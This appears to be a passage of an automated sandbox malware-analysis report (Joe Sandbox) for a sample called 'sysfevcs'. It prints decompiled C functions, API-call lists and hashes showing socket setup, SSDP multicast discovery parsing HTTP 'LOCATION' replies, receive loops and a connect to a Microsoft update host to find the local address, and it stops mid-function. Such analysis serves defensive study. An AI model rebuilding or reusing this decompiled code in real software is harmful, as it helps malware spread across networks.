                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                  • sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: Sleep.KERNELBASE(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                  • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                  • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                  • Opcode ID: 600a3606b7c72c769977816669db64cbf8458a32e0c3019308c7b7bd7d01817e
                                                                                                                                                                                                                                                                  • Instruction ID: 01a8e4080b6b474666e7a6222e05c129926e514e684bf986329747a216381769
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 600a3606b7c72c769977816669db64cbf8458a32e0c3019308c7b7bd7d01817e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE4138B4E00208EBDB14DFE4E985BEEBBB5EF48304F108179E505B7290E7755A05CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                                                                                                                  			E0040D5C0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                  				short _v8;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v33;
                                                                                                                                                                                                                                                                  				char _v52;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  				short _t24;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				void* _t26;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  				void* _t31;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t39 = __esi;
                                                                                                                                                                                                                                                                  				_t38 = __edi;
                                                                                                                                                                                                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t31 = E00408820(0x24);
                                                                                                                                                                                                                                                                  					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                  					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                  					__imp__#23(2, 2, 0x11, _t30); // executed
                                                                                                                                                                                                                                                                  					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                  					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						E0040DA20(_t31, __edi);
                                                                                                                                                                                                                                                                  						_t31 = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						return _t31;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_t24 = _v8;
                                                                                                                                                                                                                                                                  					_v24 = _t24;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t39);
                                                                                                                                                                                                                                                                  					_v30 = _t24;
                                                                                                                                                                                                                                                                  					_v33 = 1;
                                                                                                                                                                                                                                                                  					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1); // executed
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10); // executed
                                                                                                                                                                                                                                                                  					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                  						_t26 = CreateThread(0, 0, E0040D7F0, _t31, 0, 0); // executed
                                                                                                                                                                                                                                                                  						 *(_t31 + 0x14) = _t26;
                                                                                                                                                                                                                                                                  						goto L8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040DA20(_t31, _t38);
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c8
                                                                                                                                                                                                                                                                  0x0040d6b4
                                                                                                                                                                                                                                                                  0x0040d5d6
                                                                                                                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                                                                                                                  0x0040d5eb
                                                                                                                                                                                                                                                                  0x0040d5f1
                                                                                                                                                                                                                                                                  0x0040d5f8
                                                                                                                                                                                                                                                                  0x0040d604
                                                                                                                                                                                                                                                                  0x0040d607
                                                                                                                                                                                                                                                                  0x0040d60d
                                                                                                                                                                                                                                                                  0x0040d613
                                                                                                                                                                                                                                                                  0x0040d615
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61e
                                                                                                                                                                                                                                                                  0x0040d6ae
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6b0
                                                                                                                                                                                                                                                                  0x0040d626
                                                                                                                                                                                                                                                                  0x0040d62a
                                                                                                                                                                                                                                                                  0x0040d62e
                                                                                                                                                                                                                                                                  0x0040d632
                                                                                                                                                                                                                                                                  0x0040d637
                                                                                                                                                                                                                                                                  0x0040d641
                                                                                                                                                                                                                                                                  0x0040d645
                                                                                                                                                                                                                                                                  0x0040d64a
                                                                                                                                                                                                                                                                  0x0040d659
                                                                                                                                                                                                                                                                  0x0040d65e
                                                                                                                                                                                                                                                                  0x0040d663
                                                                                                                                                                                                                                                                  0x0040d66c
                                                                                                                                                                                                                                                                  0x0040d67d
                                                                                                                                                                                                                                                                  0x0040d686
                                                                                                                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                                                                                                                  0x0040d6a5
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x0040d688
                                                                                                                                                                                                                                                                  0x0040d693
                                                                                                                                                                                                                                                                  0x0040d693

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D5F8
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040D607
                                                                                                                                                                                                                                                                  • htons.WS2_32(00009E34), ref: 0040D64A
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040D66C
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040D67D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,00009E34,0040D68D), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE ref: 0040D6A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                  • Opcode ID: 69d93186513266963326354fe5a9e28ac44bad99f111d4b4b9ee11edb3e813dc
                                                                                                                                                                                                                                                                  • Instruction ID: 64ad3dadd26626afd739fbfdc7006baf33379391ae681bcd66c450bb3cd6af6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d93186513266963326354fe5a9e28ac44bad99f111d4b4b9ee11edb3e813dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821C7B4A44301AFE710DFB48C86B5776A0AF44710F40897DFA48EB2C1D7B9C80C8B6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040B260(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = _a16;
                                                                                                                                                                                                                                                                  				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = _a8;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					_t38 = _a4;
                                                                                                                                                                                                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16); // executed
                                                                                                                                                                                                                                                                  					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v16 > 0) {
                                                                                                                                                                                                                                                                  						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                  							_v24 = _a12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = _v16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t43 = _a4;
                                                                                                                                                                                                                                                                  						__imp__#16(_t43, _v8, _v24, 0); // executed
                                                                                                                                                                                                                                                                  						_v20 = _t43;
                                                                                                                                                                                                                                                                  						if(_v20 > 0) {
                                                                                                                                                                                                                                                                  							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                  							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(1); // executed
                                                                                                                                                                                                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L15;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040b269
                                                                                                                                                                                                                                                                  0x0040b270
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b281
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b294
                                                                                                                                                                                                                                                                  0x0040b298
                                                                                                                                                                                                                                                                  0x0040b2a1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b2a9
                                                                                                                                                                                                                                                                  0x0040b2b1
                                                                                                                                                                                                                                                                  0x0040b2be
                                                                                                                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2cb
                                                                                                                                                                                                                                                                  0x0040b2cf
                                                                                                                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b2e2
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2f6
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b304
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x0040b31f
                                                                                                                                                                                                                                                                  0x0040b32b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B272
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B298
                                                                                                                                                                                                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B2CF
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B2E4
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000001), ref: 0040B304
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 107502007-0
                                                                                                                                                                                                                                                                  • Opcode ID: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction ID: bff57235f866894c86fcfed964af6ad312f668c5fd324e9b8beac796e9e02ddb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34310C74900209DFCB14DFA4D948AAE77B5FF44315F10867AE821A3390C7349A50CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                                                                                                                  			E00409260() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				char _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				short _v38;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				short _v42;
                                                                                                                                                                                                                                                                  				char _v44;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                                                                                                                                  				char* _t30;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_v18 = 0;
                                                                                                                                                                                                                                                                  				_v14 = 0;
                                                                                                                                                                                                                                                                  				_v10 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 2;
                                                                                                                                                                                                                                                                  				__imp__#9(0x50);
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_t28 = E00409220("www.update.microsoft.com"); // executed
                                                                                                                                                                                                                                                                  				_v20 = _t28;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 1, 0); // executed
                                                                                                                                                                                                                                                                  				_v28 = _t28;
                                                                                                                                                                                                                                                                  				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t30 =  &_v24;
                                                                                                                                                                                                                                                                  					__imp__#4(_v28, _t30, 0x10); // executed
                                                                                                                                                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                                                                                                                                                  						_v44 = 0;
                                                                                                                                                                                                                                                                  						_v42 = 0;
                                                                                                                                                                                                                                                                  						_v38 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v48 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#6(_v28,  &_v44,  &_v48); // executed
                                                                                                                                                                                                                                                                  						_v8 = _v40;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00409320(_v28); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x00409266
                                                                                                                                                                                                                                                                  0x0040926f
                                                                                                                                                                                                                                                                  0x00409275
                                                                                                                                                                                                                                                                  0x00409278
                                                                                                                                                                                                                                                                  0x0040927b
                                                                                                                                                                                                                                                                  0x0040927e
                                                                                                                                                                                                                                                                  0x00409287
                                                                                                                                                                                                                                                                  0x0040928d
                                                                                                                                                                                                                                                                  0x00409293
                                                                                                                                                                                                                                                                  0x0040929c
                                                                                                                                                                                                                                                                  0x004092a4
                                                                                                                                                                                                                                                                  0x004092ad
                                                                                                                                                                                                                                                                  0x004092b3
                                                                                                                                                                                                                                                                  0x004092ba
                                                                                                                                                                                                                                                                  0x004092be
                                                                                                                                                                                                                                                                  0x004092c6
                                                                                                                                                                                                                                                                  0x004092ce
                                                                                                                                                                                                                                                                  0x004092d2
                                                                                                                                                                                                                                                                  0x004092d8
                                                                                                                                                                                                                                                                  0x004092db
                                                                                                                                                                                                                                                                  0x004092de
                                                                                                                                                                                                                                                                  0x004092e1
                                                                                                                                                                                                                                                                  0x004092e5
                                                                                                                                                                                                                                                                  0x004092f8
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409308
                                                                                                                                                                                                                                                                  0x0040930d
                                                                                                                                                                                                                                                                  0x00409316

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: inet_addr.WS2_32(004092A1), ref: 0040922A
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: gethostbyname.WS2_32(?), ref: 0040923D
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004092C6
                                                                                                                                                                                                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • www.update.microsoft.com, xrefs: 00409297
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                  • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                  • Opcode ID: e22f4715917177a2090027376c13fb1e08ca05e6cab91eeb7cc2824c04d17640
                                                                                                                                                                                                                                                                  • Instruction ID: a9263f03ec831ac8994e89c93e2ed8b017647d94978a45a17146db47804ae5bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e22f4715917177a2090027376c13fb1e08ca05e6cab91eeb7cc2824c04d17640
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D2129B4E10309ABCB04DFE8D946AEEBBB5AF4C300F10457EE504F3290E2715A44CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040A590(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				char* _t6;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  				_t6 = _t1;
                                                                                                                                                                                                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx); // executed
                                                                                                                                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                                                                                                                                  					_t4 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                  					_t5 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t6;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a5a3
                                                                                                                                                                                                                                                                  0x0040a5ab
                                                                                                                                                                                                                                                                  0x0040a5b5
                                                                                                                                                                                                                                                                  0x0040a5b9
                                                                                                                                                                                                                                                                  0x0040a5c1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040a5c5
                                                                                                                                                                                                                                                                  0x0040a5ce

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(ib@,00000000,00000000,00000001,F0000040,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5A3
                                                                                                                                                                                                                                                                  • CryptGenRandom.ADVAPI32(ib@,?,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5B9
                                                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(ib@,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5C5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                  • String ID: ib@
                                                                                                                                                                                                                                                                  • API String ID: 1815803762-2572181768
                                                                                                                                                                                                                                                                  • Opcode ID: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction ID: e86f9f2f6962971676cdee64fe7ddd258c269ae68294ba7c70f801d1bcef9814
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE01275650208BBDB24CBD1DD49F9A776CAB48700F104174BB09E7280DA75EA048768
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                                                                                                                                                  			E0040DA90(void* __edi) {
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t15;
